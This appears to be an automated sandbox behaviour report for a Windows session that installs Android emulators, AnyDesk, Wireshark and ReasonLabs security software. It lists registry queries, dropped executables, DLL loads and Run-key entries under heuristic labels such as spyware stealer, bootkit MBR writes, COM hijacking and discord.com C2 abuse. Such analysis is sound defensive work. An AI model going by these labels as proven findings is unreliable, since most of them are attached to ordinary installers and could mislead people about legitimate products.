Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\AnyDesk.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation F:\LDPlayer\LDPlayer9\dnuninst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\{F5A019B8-964A-4BC1-9E94-4827D0A6559D}\.cr\vc_redist.x64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation F:\BlueStacks X\BlueStacksWeb.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\Bootstrapper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\BlueStacksSetup\BSX-Setup-5.14.22.1003_nxt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\AnyDesk.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation F:\BlueStacks X\BlueStacks X.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\BlueStacks X\BlueStacks-Installer_5.14.22.1003_amd64_native.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\LDPlayer9_ens_1252_ld.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\driverconfig.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnplayer.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\vbox-img.exe N/A
N/A N/A C:\Program Files\ldplayer9box\vbox-img.exe N/A
N/A N/A C:\Program Files\ldplayer9box\vbox-img.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnuninst.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\NetLwfUninstall.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ld\lduninst_del.exe N/A
N/A N/A C:\Users\Admin\Downloads\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\BlueStacksSetup\BSX-Setup-5.14.22.1003_nxt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-ForceGPU.exe N/A
N/A N/A C:\ProgramData\BlueStacksServicesSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
N/A N/A C:\Program Files\Wireshark\vc_redist.x64.exe N/A
N/A N/A C:\Windows\Temp\{F5A019B8-964A-4BC1-9E94-4827D0A6559D}\.cr\vc_redist.x64.exe N/A
N/A N/A C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe N/A
N/A N/A C:\Program Files\Wireshark\npcap-1.78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\NPFInstall.exe N/A
N/A N/A C:\Program Files\Npcap\NPFInstall.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SYSTEM32\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\electron.app.BlueStacks Services = "C:\\Users\\Admin\\AppData\\Local\\Programs\\bluestacks-services\\BlueStacksServices.exe --hidden" C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{8bdfe669-9705-4184-9368-db9ce581e0e7} = "\"C:\\ProgramData\\Package Cache\\{8bdfe669-9705-4184-9368-db9ce581e0e7}\\VC_redist.x64.exe\" /burn.runonce" C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\rundll32.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\SysWOW64\takeown.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\cmd.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\takeown.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\takeown.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Modifies powershell logging option

evasion

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe N/A
File opened for modification \??\PhysicalDrive0 F:\ProjectTitan\Engine\ProjectTitan.exe N/A
File opened for modification \??\PhysicalDrive0 F:\ProjectTitan\Engine\TitanService.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\117308CCCD9C93758827D7CC85BB135E C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D84E548583BE1EE7DB5A935821009D26_5B98B6CD6E69202676965CF5B0E2A7A7 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db C:\Users\Admin\Downloads\AnyDesk.exe N/A
File opened for modification C:\Windows\system32\mfcm140u.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc140rus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfcm140u.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808} C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_06C655286541813B46B1E7FC734ACAF8 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAEBE581FCB73249406FC21094EA252E_BC0CE803EF41A748738619ED7838EEFC C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D84E548583BE1EE7DB5A935821009D26_5B98B6CD6E69202676965CF5B0E2A7A7 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\msvcp140_2.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc140deu.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc140rus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc140chs.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netnwifi.inf_amd64_a2bfd066656fe297\netnwifi.PNF C:\Program Files\Npcap\NPFInstall.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_06C655286541813B46B1E7FC734ACAF8 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1401C7EC8E96BC79CBFD92F9DF762D_E35D496D1CD0B884BEBCAFED0FE61600 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_38924EDF39D8802D6946FB22E5DD0835 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db C:\Users\Admin\Downloads\AnyDesk.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netserv.inf_amd64_73adce5afe861093\netserv.PNF C:\Program Files\Npcap\NPFInstall.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\229169D96B9C20761B929D428962A0A2_E724097EF7BBA8B1CB3228AA4D2ED312 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_888F944E43EFCB6810561095CD83E20A C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_888F944E43EFCB6810561095CD83E20A C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File created C:\Windows\system32\Npcap\WlanHelper.exe C:\Program Files\Wireshark\npcap-1.78.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\npcap.inf_amd64_8bd33bba90c49bc9\NPCAP.inf C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3E3E9689537B6B136ECF210088069D55_A925FAB5FFC3CEDB8E62B2DCCBBBB4F2 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DDD60D479047B9472722C3115985BD00 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db C:\Users\Admin\Downloads\AnyDesk.exe N/A
File opened for modification C:\Windows\system32\concrt140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\msvcp140_atomic_wait.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc140enu.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc140fra.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc140fra.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\206932163209AD483A44477E28192474 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File created C:\Windows\SysWOW64\Npcap\wpcap.dll C:\Program Files\Wireshark\npcap-1.78.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE392.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db C:\Users\Admin\Downloads\AnyDesk.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE391.tmp C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrass.inf_amd64_7f701cb29b5389d3\netrass.PNF C:\Program Files\Npcap\NPFInstall.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DDD60D479047B9472722C3115985BD00 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AF360AACB1570042DEFBC833317997D0_C2A57436D76F24DF346063556964EF64 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db C:\Users\Admin\Downloads\AnyDesk.exe N/A
File opened for modification C:\Windows\system32\mfc140ita.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_1FB605FD2412C4F94AD934D8134A28AC C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A37B8BA80004D3266CB4D93B2052DC10_5F5F520ABA6509FB550A7DDEB645B50F C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
